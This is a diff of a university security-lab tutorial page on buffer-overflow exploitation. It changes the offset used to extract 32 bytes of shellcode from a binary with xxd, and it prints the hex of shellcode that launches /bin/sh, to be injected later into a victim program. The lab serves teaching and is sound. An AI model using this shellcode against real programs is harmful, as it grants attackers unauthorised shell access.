MukitCSTE/UVicSENG360Labs/lab08/index.md

 ## Extracting the Binary ##

 The command extracts the given bytes from your binary.
-Make sure you use the correct offset (in my case it was 0x495).
+Make sure you use the correct offset (in my case it was 0x4f4).
 It outputs the values in hexadecimal so we can easily read it.

-	xxd -s0x495 -l32 -p a.out > shellcode
+	xxd -s0x4f4 -l32 -p a.out > shellcode

 Make sure your `shellcode` matches:

 	cat shellcode
 	eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
 	bead

+This shellcode is important because we are going to insert that later into the tutorial to make the victim program grant access to the shell.

 ## Executable Space Protection (NX) ##